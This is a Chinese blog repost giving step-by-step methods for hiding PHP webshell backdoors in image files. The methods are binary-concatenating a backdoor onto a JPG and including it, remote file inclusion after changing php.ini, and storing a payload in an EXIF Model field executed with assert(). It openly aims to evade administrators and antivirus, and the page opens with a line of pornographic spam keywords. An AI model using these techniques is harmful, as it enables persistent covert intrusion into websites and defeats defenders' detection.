日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程语言 > php >内容正文

php

php上传后门,PHP图片后门藏匿攻略

發布時間:2023/12/8 php 30 豆豆
生活随笔 收集整理的這篇文章主要介紹了 php上传后门,PHP图片后门藏匿攻略 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

我們平時藏匿圖片后門是什么流程呢?我們來看一下

0x01 初級的藏匿方法:

1、建立一個eval.php文件,上面加入我們的后門:

Default

1

2、找一張圖片1.jpg,最好是從目標網站上下載下來的圖片。

3、合并圖片和php后門:

Default

Copy /b C:\xampp\htdocs\images\1.jpg + C:\xampp\htdocs\images\eval.php C:\xampp\htdocs\images\2.jpg

1

Copy/bC:\xampp\htdocs\images\1.jpg+C:\xampp\htdocs\images\eval.phpC:\xampp\htdocs\images\2.jpg

4、在任何一個php文件中包含這個2.jpg的圖片后門,這里以images.php為例,寫入以下的代碼:

Default

1

5、上傳2.jpg和images.php,在菜刀里添加一句話后門:http://127.0.0.1/images/images.php,密碼為feiji。

訪問圖片正常:

訪問images.php頁面出現亂碼,但是后門已經正常運行:

但是一句話在菜刀里是可以解析成功的:

注:省去第3步也是可以的,只不過直接訪問圖片會亂碼,會讓管理員起疑心。

0x02 中級藏匿的方法:

1、其實就是遠程文件包含,也不只是針對圖片,要求你有高權限,能夠操縱Apache和修改php.ini文件:

修改ini的配置選項allow_url_fopen和allow_url_include為ON。

2、創建任何一個php文件中,以images.php為例,寫入以下的代碼:

Default

1

3、剛才做的圖片后門jpg可以放在別的網站(http://www.xxxx.com)上,在菜刀里添加一句話后門:

注:這樣做的優點是可以隨時變換各種后門,缺點是很難獲取到高權限。

0x03 高級的藏匿方法

背景知識:

EXIF信息: 是可交換圖像文件的縮寫,是專門為數碼相機的照片設定的,可以記錄數碼照片的屬性信息和拍攝數據。所有的JPEG文件以字符串“0xFFD8”開頭,并以字符串“0xFFD9”結束。文件頭中有一系列“0xFF??”格式的字符串,稱為“標識”,用來標記JPEG文件的信息段。“0xFFD8”表示圖像信息開始,“0xFFD9”表示圖像信息結束,這兩個標識后面沒有信息,而其它標識緊跟一些信息字符。

其實就是這個玩意兒:選定圖片右鍵選擇屬性,在詳細信息里面可以看到(win7)

1、php里面有一個函數exif_read_data(),可以取得圖片的EXIF信息頭,但是需要開啟php_exif模塊。

2、我們是可以隨意修改EXIF信息的,例如:

這里推薦一個小工具,PowerExif ,下載地址為:

免費版可以修改部分EXIF信息頭,但是對我們來說已經足夠了。

打開工具,點擊添加,在修改機型信息,如下:

添加我們的PAYLOAD:

3、我們來調試一下:

Default

$exif = exif_read_data('460.jpg');

var_dump($exif);

?>

1

2

3

4

5

6

7

$exif=exif_read_data('460.jpg');

var_dump($exif);

?>

輸出:

4、利用方法:

在php腳本上寫入:

Default

$exif = exif_read_data ('460.jpg');

assert($exif['Model']);

?>

1

2

3

4

5

6

7

$exif=exif_read_data('460.jpg');

assert($exif['Model']);

?>

有同學可能會問,為什么要使用這種方法藏匿圖片后門,這個不是和初級的藏匿方法等效嗎?原因有三:

有經驗的管理員一看include文件就會發現有端倪。

殺軟會重點檢查include包含的文件。

exif_read_data()函數可以包含遠程的JPG文件,也就是等效于一個遠程漏洞文件包含咯。

【via@91ri.org團隊】 未經授權,禁止轉載!

總結

以上是生活随笔為你收集整理的php上传后门,PHP图片后门藏匿攻略的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。